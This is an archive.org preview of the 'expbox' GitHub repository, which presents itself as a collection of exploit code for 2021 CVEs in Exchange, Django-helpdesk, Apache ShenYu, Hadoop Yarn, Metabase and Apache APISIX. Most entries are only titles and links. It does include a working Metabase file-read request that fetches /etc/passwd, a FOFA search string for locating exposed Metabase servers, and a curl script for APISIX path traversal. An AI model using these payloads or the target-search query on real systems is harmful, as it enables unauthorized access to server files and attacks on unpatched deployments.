github.com-0x0021h-expbox_-_2021-11-23_10-33-09
Item Preview
Vulnerability Exploitation Code Collection Repository
Introduction
expbox is an exploit code collection repository
List
CVE-2021-41349 Exchange XSS PoC<= Exchange 2013 update 23<= Exchange 2016 update 22<= Exchange 2019 update 11CVE-2021–3945 Django-helpdesk stored XSS PoC<= 0.3.0
CVE-2021-37580 Apache ShenYu 2.3.0/2.4.0 authentication bypassRef: https://github.com/fengwenhua/CVE-2021-37580
Hadoop Yarn RPC RCERef: https://github.com/cckuailong/YarnRpcRCE
CVE-2021-41277 MetaBase Arbitrary File Read```MetaBase < 0.40.51.0.0 <= MetaBase < 1.40.5
FOFA:
app="Metabase"
PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1```
CVE-2021-42321 Exchange Pre-Auth RCE<= Exchange 2016 update 22<= Exchange 2019 update 11Windows 0day
Ref:https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-43557 Apache APISIX: Path traversal in request_uri variable```
/bin/bash
kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is http://127.0.0.1:9080$1 -H 'Host: app.test'```
Note
All content comes from the Internet, if there is a copyright problem, please contact me to delete.
To restore the repository download the bundle
wget https://archive.org/download/github.com-0x0021h-expbox_-_2021-11-23_10-33-09/0x0021h-expbox_-_2021-11-23_10-33-09.bundle git clone 0x0021h-expbox_-_2021-11-23_10-33-09.bundle Source: https://github.com/0x0021h/expbox
Uploader: 0x0021h
Upload date: 2021-11-23
- Originalurl
-
https://github.com/0x0021h/expbox
